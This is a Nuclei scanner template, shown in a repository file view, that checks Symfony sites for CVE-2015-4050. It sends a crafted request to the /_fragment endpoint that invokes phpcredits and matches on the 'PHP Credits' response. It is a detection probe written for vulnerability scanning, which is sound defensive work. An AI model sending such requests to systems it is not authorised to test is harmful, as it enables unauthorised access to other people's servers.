nuclei-templates/cves/2015/CVE-2015-4050.yaml

26 lines
482 B
YAML
Raw Normal View History

2021-08-30 13:49:02 +00:00
id: CVE-2015-4050
info:
name: CVE-2015-4050
author: ELSFA7110
severity: high
reference: |
- https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access
tags: cve,cve2015,symfony,rce
requests:
- method: GET
path:
- "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Credits"
part: body
- type: status
status:
- 200